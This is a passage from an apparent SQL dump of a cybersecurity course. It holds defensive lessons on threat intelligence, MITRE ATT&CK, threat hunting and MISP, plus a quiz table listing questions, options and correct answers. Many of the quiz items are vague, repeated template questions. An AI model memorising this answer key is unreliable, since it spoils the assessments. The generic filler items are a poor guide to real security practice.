(990, 777, '## Indicators: IOCs vs IOAs\n\nIn Cyber Threat Intelligence, an **Indicator** is a piece of information that suggests a potential compromise or attack. But not all indicators are created equal.\n\n### 1. Indicators of Compromise (IOC)\nEvidence that a breach has **already occurred**. These are static artifacts.\n*   **The \"Forensic\" Approach**.\n*   **Examples**:\n    *   **MD5 Hash**: `a1b2c3d4...` (A known malware file).\n    *   **IP Address**: `192.168.1.5` (A known C2 server).\n    *   **Domain**: `update-microsoft-support.com` (A phishing site).\n*   **Use Case**: You load these into your Firewall/EDR to **Block** bad things.\n*   **Weakness**: They are easy to change. An attacker can change a file hash in 1 second by adding a null byte.\n\n### 2. Indicators of Attack (IOA)\nEvidence of the **intent** or **behavior** of an attack in progress.\n*   **The \"Real-time\" Approach**.\n*   **Examples**:\n    *   **Lateral Movement**: A user logging into 50 servers in 1 minute.\n    *   **Credential Dumping**: Accessing the `lsass.exe` process memory.\n    *   **Persistence**: Creating a Scheduled Task named \"Updater\" that runs a script in `C:Temp`.\n*   **Use Case**: You write behavioral rules (SIEM/EDR) to detect the *technique*, not the specific file.\n*   **Strength**: Behaviors are hard to change. If an attacker wants to dump credentials, they *must* touch memory somehow.\n\n---\n\n### The Pyramid of Pain\nCreated by David Bianco, this concept illustrates how much pain you cause the adversary when you deny them each indicator type.\n\n1.  **Hash Values (Trivial)**: Attacker just recompiles. NO PAIN.\n2.  **IP Addresses (Easy)**: Attacker rents a new VPS. LOW PAIN.\n3.  **Domain Names (Simple)**: Attacker registers a new domain. LOW PAIN.\n4.  **Network / Host Artifacts (Annoying)**: e.g., \"User Agent String\". Attacker must recode their tool. MEDIUM PAIN.\n5.  **Tools (Challenging)**: e.g., \"Mimikatz\". If you detect the *tool*, they must write a new one. HIGH PAIN.\n6.  **TTPs (Tough!)**: Tactics, Techniques, and Procedures. If you detect *how* they behave (e.g., \"Pass the Hash\"), they have to relearn how to hack. **MAXIMUM PAIN**.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(991, 778, '## Traffic Light Protocol (TLP)\n\nIntelligence is useless if not shared, but dangerous if shared too widely. The **Traffic Light Protocol (TLP)** is the global standard for defining \"Who can see this?\"\n\nIt was updated to TLP 2.0 in 2022.\n\n---\n\n### TLP Levels\n\n#### 🔴 TLP:RED (For Your Eyes Only)\n*   **Definition**: Not for disclosure, restricted to participants only.\n*   **Scenario**: A partner sends you a list of compromised employees involved in an internal investigation.\n*   **Action**: You cannot share this with *anyone* outside the specific meeting/email thread. Not even your boss, unless they were named.\n\n#### 🟠 TLP:AMBER (Limited Disclosure)\n*   **Definition**: Limited disclosure, recipients can only spread this on a need-to-know basis within their organization and its clients.\n*   **Scenario**: A vendor tells you about a vulnerability in their software that is actively exploited but no patch exists yet.\n*   **Action**: You can tell your System Admins to block the port. You CANNOT write a blog post about it.\n*   **TLP:AMBER+STRICT**: New in 2.0. Means \"Organization Only\" (No clients).\n\n#### 🟢 TLP:GREEN (Community Wide)\n*   **Definition**: Limited disclosure, restricted to the community.\n*   **Scenario**: An industry ISAC (e.g., Financial-ISAC) shares a list of Phishing domains targeting banks.\n*   **Action**: You can share this with partner organizations and peers. You CANNOT publish it on public Twitter.\n\n#### ⚪ TLP:CLEAR (Public)\n*   **Definition**: Subject to standard copyright rules, otherwise unrestricted.\n*   **Scenario**: A published whitepaper on APT29.\n*   **Action**: Post it on LinkedIn, print it, shout it from the rooftops.\n\n---\n\n### Sharing Standards: STIX & TAXII\nHow do we share this data technically?\n\n1.  **STIX (Structured Threat Information Expression)**: The **Language**.\n    *   It is a JSON format.\n    *   It defines objects like `Attack Pattern`, `Identity`, `Malware`, `Indicator`.\n2.  **TAXII (Trusted Automated eXchange of Intelligence Information)**: The **Transport**.\n    *   It is the API (HTTPS) that carries the STIX packages.\n    *   Think of STIX as the package and TAXII as the delivery truck.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(992, 779, '## Module 4 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(993, 780, '## MITRE ATT&CK Framework\n\n**Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)**.\nIt is the periodic table of hacker behavior. It moves us away from \"My antivirus blocked a virus\" to \"The adversary used **T1059.001 (PowerShell)** to execute code.\"\n\n### The Hierarchy\n1.  **Tactics (The Goal - \"Why\")**: The column headers. There are 14 tactics.\n    *   *Examples*: Initial Access, execution, Persistence, Privilege Escalation, Command and Control.\n2.  **Techniques (The Method - \"How\")**: The cells in the column.\n    *   *Example*: Under \"Initial Access\", you have \"Phishing\" (T1566) and \"Exploit Public-Facing Application\" (T1190).\n3.  **Procedures (The Implementation - \"Specifics\")**: The exact command or tool used.\n    *   *Example*: \"APT33 sent a spearphishing email with a malicious HTA file.\"\n\n### Deep Dive: Technique T1059 (Command and Scripting Interpreter)\nThis is one of the most common techniques.\n*   **Sub-Techniques**:\n    *   `.001 PowerShell`: Windows native automation tool. Loved by hackers because it is installed everywhere.\n    *   `.004 Unix Shell`: Bash/Zsh on Linux/Mac.\n*   **Detection**: You cannot just \"Block PowerShell\". You must look for *malicious use* of PowerShell (e.g., Encoded Commands, Downloads).\n\n### Why use ATT&CK?\n1.  **Common Language**: Red Team says \"I validated T1059\". Blue Team says \"I detected T1059\". Executive says \"We are protected against Scripting attacks\".\n2.  **Gap Analysis**: You can map your defenses against the matrix. \"We have great coverage for Malware (Execution) but zero coverage for Exfiltration\".', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(994, 781, '## MITRE ATT&CK Navigator\n\nThe **Navigator** is an open-source web tool tailored for annotating and visualizing the ATT&CK Matrix. It allows you to create \"Layers\".\n\n### Use Case 1: Threat Profiling\nScenario: You work for a Bank. You are worried about the \"Carbanak\" group.\n1.  Open Navigator.\n2.  Select \"Carbanak\" from the Threat Actor list.\n3.  The tool highlights every technique Carbanak has used in red.\n**Result**: A visual map of your enemy\'s playbook.\n\n### Use Case 2: Defensive Coverage Map\n1.  Create a new Layer.\n2.  Ask your SIEM engineers: \"Can we detect PowerShell?\" (Yes -> Color Green). \"Can we detect Exfiltration over USB?\" (No -> Color Red).\n3.  Fill in the matrix based on your actual capabilities.\n**Result**: A \"You Are Here\" map of your security posture.\n\n### Use Case 3: Overlay (The Gap Analysis)\n1.  Take the **Threat Layer** (Red).\n2.  Take the **Defense Layer** (Green).\n3.  Combine them.\n4.  **The Panic Zone**: Any technique that is colored Red (Threat uses it) but NOT Green (Defense covers it).\n**Result**: This is your immediate roadmap. \"We need to build detections for T1059 because Carbanak uses it and we can\'t see it.\"', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(995, 782, '## Module 5 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(996, 783, '## Introduction to Threat Hunting\n\n**Threat Hunting** is the process of proactively and iteratively searching through networks to detect and isolate advanced threats that avoid existing security solutions.\n\n### The \"Assume Breach\" Paradigm\nTraditional security assumes \"We are safe until the alarm rings.\"\nHunting assumes **\"We are already compromised, we just haven\'t found it yet.\"**\n\n### Types of Hunts\n1.  **Hypothesis Driven**: The scientific method.\n    *   *Hypothesis*: \"Attackers are traversing our network using `PsExec`.\"\n    *   *Test*: Search logs for Event ID 7045 (Service Install) matching PsExec patterns.\n2.  **Intelligence Driven**: Based on a new report.\n    *   *Input*: \"CISA releases report on Volt Typhoon using living-off-the-land binaries.\"\n    *   *Hunt*: Search for the specific behaviors mentioned in the report.\n3.  **Analytics Driven**: Using Math/ML.\n    *   *Input*: \"Show me any user who logged into more than 10 machines in 1 hour.\" (Outlier detection).\n\n### The Hunting Maturity Model (HMM)\n*   **HMM0 (Initial)**: relies primarily on automated alerting. No hunting.\n*   **HMM1 (Minimal)**: Incorporates threat intelligence to drive search.\n*   **HMM2 (Procedural)**: Follows established procedures for hunting. Routine.\n*   **HMM3 (Innovative)**: Creates new hunting methods and automates them.\n*   **HMM4 (Leading)**: Automates the entire process.\n\n### Success Metrics\nHow do you measure a Hunt?\n*   It is **NOT** just \"Finding Bad Guys\". If you hunt for 4 hours and find nothing, that is a success! You proved the network is clean of that specific threat.\n*   **Goal**: Improve Visibility. If you tried to hunt for `PsExec` and couldn\'t because you didn\'t have the right logs, the \"Success\" is identifying that logging gap.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(997, 784, '## Hunting Techniques: Stacking & Clustering\n\nWhen you have 100 Million log events, you can\'t read them all. You need data science techniques to find the needle in the haystack.\n\n### 1. Stacking (Frequency Analysis)\nAlso known as \"Least Frequency Analysis\".\n**Concept**: In a large network, \"Normal\" behaves the same way. \"Evil\" stands out because it is rare.\n\n**Scenario**:\nYou export the \"User Agent\" string from all web traffic in your company.\n1.  **Mozilla/5.0... (Chrome)**: 50,000 counts. (Normal employees).\n2.  **Mozilla/5.0... (Edge)**: 30,000 counts. (Normal employees).\n3.  ...\n4.  **Updates.exe**: 500 counts. (Windows Update).\n5.  **Python-urllib/3.8**: 2 counts. (**Suspicious!**)\n6.  **Kali-Linux**: 1 count. (**Malicious!**).\n\nYou ignore the \"Short Stack\" (High frequency) and investigate the \"Long Tail\" (Low frequency).\n\n### 2. Clustering\nGrouping data points by shared characteristics to find patterns.\n*   **Example**: Grouping all \"svchost.exe\" processes.\n    *   We know `svchost.exe` should usually be spawned by `services.exe`.\n    *   If we cluster by \"Parent Process\", we might see:\n        *   Cluster A: Parent = `services.exe` (Count: 9000).\n        *   Cluster B: Parent = `explorer.exe` (Count: 1). **MALICIOUS**. Services do not run from explorer.\n\n### 3. Box Plotting (Outliers)\nVisualizing data to see who is outside the norm.\n*   \"Average Data Upload per User per Day\": 50MB.\n*   \"User Bob\": 50GB.\nBob is an outlier. He is either backing up his PC or exfiltrating data.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(998, 785, '## Module 6 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(999, 786, '## Threat Intelligence Platform (TIP)\n\nA **TIP** is the heart of a CTI program. It is where you aggregate, analyze, and disseminate intelligence. Without a TIP, you are just managing Spreadsheets of Death.\n\n### Core Functions of a TIP\n\n#### 1. Maximum Aggregation\nYou have 50 sources of intel:\n*   Paid Feeds (CrowdStrike, Mandiant).\n*   Open Source Feeds (AlienVault OTX, Abuse.ch).\n*   ISAC Emails (Financial-ISAC).\n*   Twitter APIs.\nA TIP sucks all of these in automatically via API.\n\n#### 2. Normalization & Deduplication\nIf CrowdStrike reports `IP: 1.2.3.4` as \"Cobalt Strike\" and AlienVault reports `IP: 1.2.3.4` as \"Scanning\", you don\'t want two rows in your database.\nThe TIP merges these into one \"Object\" with two \"tags\".\n\n#### 3. Enrichment (Context)\nWhen an indicator arrives, the TIP asks questions automatically:\n*   **VirusTotal**: \"What is the detection ratio?\"\n*   **Whois**: \"When was this domain registered?\"\n*   **Passive DNS**: \"What domains resolved to this IP in the past?\"\nThis saves the analyst 20 minutes of manual searching per indicator.\n\n#### 4. Dissemination (Integration)\nThe most important part.\n*   **SIEM**: Push High Confidence IOCs to Splunk for detection.\n*   **Firewall**: Push High Confidence IPs to the Edge Firewall for blocking.\n*   **SOAR**: Trigger a playbook to scan endpoints for a file hash.\n\n---\n\n### The TIP Ecosystem\nThe TIP sits in the middle.\n*   **Input**: Feeds -> TIP\n*   **Output**: TIP -> SIEM / Firewall / EDR.\n\n> 💡 **Pro Tip**: Never push \"Raw Feed\" data directly to a Firewall. You block Google DNS by mistake once, and you lose your job. Always filter through a TIP first.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:47:47'),
(1000, 787, '## MISP (Malware Information Sharing Platform)\n\n**MISP** is the de-facto standard for sharing threat intelligence. It is free, open source, and used by NATO, Governments, and 6,000+ organizations.\n\n### The MISP Data Model\nUnderstanding MISP requires understanding its hierarchy:\n\n1.  **Event**: The \"Folder\".\n    *   *Example*: \"Emotet Phishing Campaign - Dec 2024\".\n    *   Contains metadata: Date, Org, TLP Level.\n2.  **Attribute**: The \"File\".\n    *   *Example*: `192.168.1.1` (ip-dst), `malware.exe` (filename).\n    *   **IDS Flag**: If checked, this attribute is exported to NIDS/SIEM.\n3.  **Object**: A template for complex data.\n    *   *Example*: A \"File\" object links `filename`, `md5`, `sha1`, and `size` together so context isn\'t lost.\n4.  **Galaxy (Tags)**: High level context.\n    *   *Threat Actor*: \"APT29\".\n    *   *Mitre technique*: \"T1566 - Phishing\".\n\n### The Sharing Graph\nMISP instances synchronize.\n*   **Pull**: You connect to `CIRCL.lu` (The main European node) and download 50,000 events.\n*   **Push**: You create an event about a new threat and \"Publish\" it. It replicates to all your partners instantly.\n*   **Filter**: You can say \"Pull everything EXCEPT events marked TLP:RED.\"\n\n### Why use MISP?\n*   **Cost**: Free.\n*   **Community**: It is where the community lives.\n*   **Formats**: Exports to STIX, CSV, Snort, Suricata, Bro/Zeek automatically.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:47:47'),
(1001, 788, '## Module 7 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(1002, 789, '## Writing Effective Intelligence Reports\n\nThe best analysis in the world is worthless if the report is confusing.\n\n### 1. The BLUF (Bottom Line Up Front)\nExecutives do not read mystery novels. They want the spoiler on page 1.\n*   **Structure**: State the **Key Judgment** and **Recommendation** in the first paragraph.\n*   *Example*:\n    > **Executive Summary**: We assess with High Confidence that the \"Finance-Payroll\" server is compromised by Ransomware. We recommend immediate network isolation of the entire Finance subnet to prevent spread.\n\n### 2. Words of Estimative Probability (WEP)\nNever use vague words like \"Maybe\", \"Possibly\", or \"Might\". They mean different things to different people.\nStandardize your language (based on Intelligence Community Directives - ICD 203):\n\n| Term | Probability | Meaning |\n|---|---|---|\n| **Almost Certain** | 90-99% | No doubt. Strong evidence. |\n| **Likely / Probable** | 60-90% | Logical, supported by evidence, but gaps exist. |\n| **Roughly Even Chance** | 40-60% | Could go either way. Ambiguous evidence. |\n| **Unlikely** | 10-40% | Evidence suggests this is not the case. |\n| **Remote** | < 10% | Highly improbable. |\n\n*   *Bad*: \"It might be Russia.\"\n*   *Good*: \"We assess with **Moderate Confidence** that the actor is Russian-aligned.\"\n\n### 3. Audience Analysis\nWrite for the reader, not for yourself.\n*   **Strategic Report (CISO/Board)**:\n    *   **Focus**: Impact, Cost, Risk, Trends.\n    *   **Language**: Business English. No \"Hash values\" or \"IPs\".\n    *   **Length**: 1 Page max.\n*   **Operational Report (SOC Manager)**:\n    *   **Focus**: TTPs, Attribution, Campaign timeline.\n    *   **Language**: Technical but explained.\n*   **Tactical Report (Analyst/Engineer)**:\n    *   **Focus**: IOCs, Signatures, Rules.\n    *   **Language**: Raw Data (JSON/CSV). \"Just give me the list.\"\n\n### 4. Analysis vs Facts\nClearly separate **what you know** (Facts) from **what you think** (Assessment).\n*   *Fact*: \"The malware communicates with 1.2.3.4.\"\n*   *Assessment*: \"1.2.3.4 is likely a C2 server.\"\nIf you mix them, you mislead the reader.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:47:47'),
(1003, 790, '## Module 8 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32');

-- --------------------------------------------------------

--
-- Table structure for table `lesson_questions`
--

DROP TABLE IF EXISTS `lesson_questions`;
CREATE TABLE `lesson_questions` (
  `id` int(11) NOT NULL,
  `task_id` int(11) NOT NULL,
  `question_text` text NOT NULL,
  `question_order` int(11) NOT NULL,
  `correct_answer` text NOT NULL,
  `case_sensitive` tinyint(1) DEFAULT 0,
  `hint` text DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `options` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL CHECK (json_valid(`options`))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `lesson_questions`
--

INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(4164, 1, 'Which component of the CIA Triad ensures that data has not been tampered with?', 1, 'Integrity', 0, 'Think about accuracy and trustworthiness.', '2025-12-26 14:39:59', '[\"Confidentiality\", \"Integrity\", \"Availability\", \"Authorization\"]'),
(4165, 1, 'What is the primary goal of a Phishing attack?', 2, 'To trick users into revealing information', 0, 'It often involves fraudulent emails.', '2025-12-26 14:39:59', '[\"To encrypt hard drives\", \"To slow down the network\", \"To trick users into revealing information\", \"To physically damage hardware\"]'),
(4166, 1, 'Who is considered the \"first line of defense\" in a security team?', 3, 'SOC Analyst', 0, 'They monitor alerts and logs daily.', '2025-12-26 14:39:59', '[\"CISO\", \"SOC Analyst\", \"HR Manager\", \"External Auditors\"]'),
(4167, 2, 'What is the first step in response?', 1, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Panic\", \"Shutdown\", \"Detection\", \"Ignoring\"]'),
(4168, 2, 'Who is the primary adversary?', 2, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"Threat actor\", \"Manager\", \"System admin\", \"Regular user\"]'),
(4169, 2, 'What is the priority level?', 3, 'High priority', 0, 'Urgency level', '2025-12-26 14:39:59', '[\"No priority\", \"Optional\", \"Low priority\", \"High priority\"]'),
(4170, 3, 'What is the main output?', 1, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Log data\", \"Video streams\", \"Music files\", \"Printer ink\"]'),
(4171, 3, 'When to escalate?', 2, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"Confirmed threat\", \"False alarm\", \"User login\", \"Minor bug\"]'),
(4172, 3, 'What is the priority level?', 3, 'High priority', 0, 'Urgency level', '2025-12-26 14:39:59', '[\"High priority\", \"Low priority\", \"Optional\", \"No priority\"]'),
(4173, 4, 'What is the defensive goal?', 1, 'Protection', 0, 'Safety', '2025-12-26 14:39:59', '[\"Deleting\", \"Protection\", \"Exposure\", \"Sharing\"]'),
(4174, 4, 'What is the first step in response?', 2, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Panic\", \"Ignoring\", \"Shutdown\", \"Detection\"]'),
(4175, 4, 'What tool category is this?', 3, 'Security tool', 0, 'Software type', '2025-12-26 14:39:59', '[\"Game engine\", \"Music player\", \"Security tool\", \"Office tool\"]'),
(4176, 5, 'Who is the primary adversary?', 1, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"Threat actor\", \"System admin\", \"Manager\", \"Regular user\"]'),
(4177, 5, 'What is the main output?', 2, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Printer ink\", \"Music files\", \"Video streams\", \"Log data\"]'),
(4178, 5, 'What should you analyze first?', 3, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Weather\", \"Lunch menu\", \"Sports scores\", \"Context\"]'),
(4179, 6, 'What is the primary goal of this concept?', 1, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Risk reduction\", \"Data deletion\", \"Cost increase\", \"System slowdown\"]'),
(4180, 6, 'What should you analyze first?', 2, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Context\", \"Sports scores\", \"Weather\", \"Lunch menu\"]'),
(4181, 6, 'When to escalate?', 3, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"False alarm\", \"Confirmed threat\", \"User login\", \"Minor bug\"]'),
(4182, 7, 'What tool category is this?', 1, 'Security tool', 0, 'Software type', '2025-12-26 14:39:59', '[\"Office tool\", \"Music player\", \"Game engine\", \"Security tool\"]'),
(4183, 7, 'What is the primary goal of this concept?', 2, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Risk reduction\", \"Data deletion\", \"Cost increase\", \"System slowdown\"]'),
(4184, 7, 'Which team handles these incidents?', 3, 'SOC team', 0, 'Security Operations', '2025-12-26 14:39:59', '[\"HR Department\", \"SOC team\", \"Marketing\", \"Sales Team\"]'),
(4185, 8, 'What is the main output?', 1, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Log data\", \"Music files\", \"Printer ink\", \"Video streams\"]'),
(4186, 8, 'What is the first step in response?', 2, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Ignoring\", \"Panic\", \"Detection\", \"Shutdown\"]'),
(4187, 8, 'What is the primary goal of this concept?', 3, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Cost increase\", \"System slowdown\", \"Data deletion\", \"Risk reduction\"]'),
(4188, 9, 'What tool category is this?', 1, 'Security tool', 0, 'Software type', '2025-12-26 14:39:59', '[\"Office tool\", \"Security tool\", \"Music player\", \"Game engine\"]'),
(4189, 9, 'What should you analyze first?', 2, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Weather\", \"Context\", \"Lunch menu\", \"Sports scores\"]'),
(4190, 9, 'Who is the primary adversary?', 3, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"Threat actor\", \"System admin\", \"Manager\", \"Regular user\"]'),
(4191, 10, 'What should you analyze first?', 1, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Weather\", \"Sports scores\", \"Lunch menu\", \"Context\"]'),
(4192, 10, 'Which team handles these incidents?', 2, 'SOC team', 0, 'Security Operations', '2025-12-26 14:39:59', '[\"Marketing\", \"SOC team\", \"Sales Team\", \"HR Department\"]'),
(4193, 10, 'Who is the primary adversary?', 3, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"System admin\", \"Threat actor\", \"Regular user\", \"Manager\"]'),
(4194, 11, 'What is the main output?', 1, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Video streams\", \"Log data\", \"Printer ink\", \"Music files\"]'),
(4195, 11, 'What is the first step in response?', 2, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Shutdown\", \"Detection\", \"Panic\", \"Ignoring\"]'),
(4196, 11, 'When to escalate?', 3, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"User login\", \"False alarm\", \"Confirmed threat\", \"Minor bug\"]'),
(4197, 12, 'What is the primary goal of this concept?', 1, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Cost increase\", \"System slowdown\", \"Risk reduction\", \"Data deletion\"]'),
(4198, 12, 'When to escalate?', 2, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"Minor bug\", \"Confirmed threat\", \"User login\", \"False alarm\"]'),
(4199, 12, 'What is the defensive goal?', 3, 'Protection', 0, 'Safety', '2025-12-26 14:39:59', '[\"Exposure\", \"Deleting\", \"Protection\", \"Sharing\"]'),
(5264, 32, 'What is the standard system drive letter?', 1, 'C:', 0, 'Primary Windows drive', '2025-12-26 20:49:49', '[\"A:\", \"B:\", \"C:\", \"D:\"]'),
(5265, 32, 'Which file system is modern and supports permissions?', 2, 'NTFS', 0, 'Permissions supported', '2025-12-26 20:49:49', '[\"FAT32\", \"NTFS\", \"exFAT\", \"HFS+\"]'),
(5266, 32, 'What is the max file size for FAT32?', 3, '4 GB', 0, 'Size limit', '2025-12-26 20:49:49', '[\"2 GB\", \"4 GB\", \"8 GB\", \"Unlimited\"]'),
(5267, 33, 'What does UAC stand for?', 1, 'User Account Control', 0, 'Permission system', '2025-12-26 20:49:49', '[\"User Access Control\", \"User Account Control\", \"Unified Access Center\", \"Universal App Control\"]'),
(5268, 33, 'Which color shield indicates a trusted app?', 2, 'Blue', 0, 'Signed application', '2025-12-26 20:49:49', '[\"Red\", \"Yellow\", \"Blue\", \"Green\"]'),
(5269, 33, 'Which UAC level is the most secure?', 3, 'Always Notify', 0, 'Maximum protection', '2025-12-26 20:49:49', '[\"Always Notify\", \"Notify me only when apps try to make changes\", \"Notify me (do not dim my desktop)\", \"Never Notify\"]'),
(5270, 34, 'Which hive stores system-wide settings?', 1, 'HKLM', 0, 'LOCAL_MACHINE', '2025-12-26 20:49:49', '[\"HKCU\", \"HKLM\", \"HKU\", \"HKCR\"]'),
(5271, 34, 'What is the GUI tool for editing the registry?', 2, 'regedit', 0, 'Graphical editor', '2025-12-26 20:49:49', '[\"cmd\", \"regedit\", \"taskmgr\", \"msconfig\"]'),
(5272, 34, 'Which data type is used for text strings?', 3, 'REG_SZ', 0, 'String Value', '2025-12-26 20:49:49', '[\"REG_DWORD\", \"REG_BINARY\", \"REG_SZ\", \"REG_MULTI_SZ\"]'),
(5273, 35, 'What does AD stand for?', 1, 'Active Directory', 0, 'Directory service', '2025-12-26 20:49:49', '[\"Advanced Directory\", \"Active Directory\", \"Access Domain\", \"Admin Domain\"]'),
(5274, 35, 'Which server role authenticates users in AD?', 2, 'Domain Controller', 0, 'Runs AD DS', '2025-12-26 20:49:49', '[\"File Server\", \"Web Server\", \"Domain Controller\", \"DNS Server\"]'),
(5275, 35, 'What is the primary authentication protocol in AD?', 3, 'Kerberos', 0, 'Ticket-based', '2025-12-26 20:49:49', '[\"NTLM\", \"Kerberos\", \"Radius\", \"LDAP\"]'),
(5276, 36, 'What is the naming format for PowerShell cmdlets?', 1, 'Verb-Noun', 0, 'Action-Target', '2025-12-26 20:49:49', '[\"Verb-Noun\", \"Noun-Verb\", \"Action-Object\", \"Subject-Predicate\"]'),
(5277, 36, 'Which cmdlet lists running processes?', 2, 'Get-Process', 0, 'Usage: Get-Process', '2025-12-26 20:49:49', '[\"list-proc\", \"Get-Process\", \"Show-Tasks\", \"ps-list\"]'),
(5278, 36, 'What is the file extension for PowerShell scripts?', 3, '.ps1', 0, 'PowerShell 1', '2025-12-26 20:49:49', '[\".bat\", \".sh\", \".ps1\", \".exe\"]'),
(5279, 37, 'Which event ID indicates a successful logon?', 1, '4624', 0, 'Security Success', '2025-12-26 20:49:49', '[\"4625\", \"4624\", \"4672\", \"1074\"]'),
(5280, 37, 'Which event ID indicates a failed logon?', 2, '4625', 0, 'Security Failure', '2025-12-26 20:49:49', '[\"4624\", \"4625\", \"4768\", \"7045\"]'),
(5281, 37, 'Which log records login attempts?', 3, 'Security', 0, 'Auth events', '2025-12-26 20:49:49', '[\"System\", \"Application\", \"Security\", \"Setup\"]'),
(5282, 38, 'What does GPO stand for?', 1, 'Group Policy Object', 0, 'Config object', '2025-12-26 20:49:49', '[\"General Policy Option\", \"Group Policy Object\", \"Global Permission Order\", \"Group Permission Object\"]'),
(5283, 38, 'Which command forces a GP update?', 2, 'gpupdate /force', 0, 'Refresh command', '2025-12-26 20:49:49', '[\"gpupdate /force\", \"gprefresh\", \"update-policy\", \"gpreload\"]'),
(5284, 38, 'What is the order of GPO application?', 3, 'LSDOU', 0, 'Local, Site, Domain, OU', '2025-12-26 20:49:49', '[\"DSOUL\", \"LSDOU\", \"OUDSC\", \"SLDOU\"]'),
(5285, 39, 'Which built-in tool provides real-time virus protection?', 1, 'Windows Defender', 0, 'Antivirus', '2025-12-26 20:49:49', '[\"Windows Firewall\", \"Windows Defender\", \"BitLocker\", \"SmartScreen\"]'),
(5286, 39, 'Which Sysinternals tool is an advanced Task Manager?', 2, 'Process Explorer', 0, 'Process info', '2025-12-26 20:49:49', '[\"Process Monitor\", \"Autoruns\", \"Process Explorer\", \"PsExec\"]'),
(5287, 39, 'Which tool provides full disk encryption?', 3, 'BitLocker', 0, 'Disk security', '2025-12-26 20:49:49', '[\"SecureBoot\", \"BitLocker\", \"EFS\", \"Vault\"]'),
(5339, 22, 'Which layer is responsible for logical addressing (IPs)?', 1, 'Network', 0, 'Layer 3', '2025-12-26 20:53:36', '[\"Data Link\", \"Network\", \"Transport\", \"Session\"]'),
(5340, 22, 'What is the PDU of Layer 4 (Transport)?', 2, 'Segments', 0, 'TCP Data unit', '2025-12-26 20:53:36', '[\"Bits\", \"Frames\", \"Packets\", \"Segments\"]'),
(5341, 22, 'Which layer handles encryption and compression?', 3, 'Presentation', 0, 'Layer 6', '2025-12-26 20:53:36', '[\"Application\", \"Presentation\", \"Session\", \"Transport\"]'),
(5342, 23, 'Which protocol uses a 3-way handshake?', 1, 'TCP', 0, 'Connection-oriented', '2025-12-26 20:53:36', '[\"UDP\", \"IP\", \"TCP\", \"ICMP\"]'),
(5343, 23, 'Why is UDP used for video streaming?', 2, 'Speed', 0, 'Low overhead', '2025-12-26 20:53:36', '[\"Reliability\", \"Encryption\", \"Speed\", \"Guaranteed Delivery\"]'),
(5344, 23, 'Which TCP/IP layer corresponds to OSI Layer 3 (Network)?', 3, 'Internet', 0, 'IP Layer', '2025-12-26 20:53:36', '[\"Network Access\", \"Internet\", \"Transport\", \"Application\"]'),
(5345, 24, 'Which IP address is a private Class C address?', 1, '192.168.1.10', 0, 'Home router default', '2025-12-26 20:53:36', '[\"8.8.8.8\", \"172.16.0.1\", \"192.168.1.10\", \"10.0.0.5\"]'),
(5346, 24, 'How many bits are in an IPv4 address?', 2, '32', 0, 'Binary count', '2025-12-26 20:53:36', '[\"128\", \"64\", \"32\", \"16\"]'),
(5347, 24, 'What allows private IPs to access the internet?', 3, 'NAT', 0, 'Translation', '2025-12-26 20:53:36', '[\"DHCP\", \"DNS\", \"NAT\", \"ARP\"]'),
(5348, 25, 'What is the CIDR notation for 255.255.255.0?', 1, '/24', 0, 'Count the bits', '2025-12-26 20:53:36', '[\"/8\", \"/16\", \"/24\", \"/32\"]'),
(5349, 25, 'How many usable hosts are in a /24 network?', 2, '254', 0, '256 minus 2', '2025-12-26 20:53:36', '[\"256\", \"255\", \"254\", \"250\"]'),
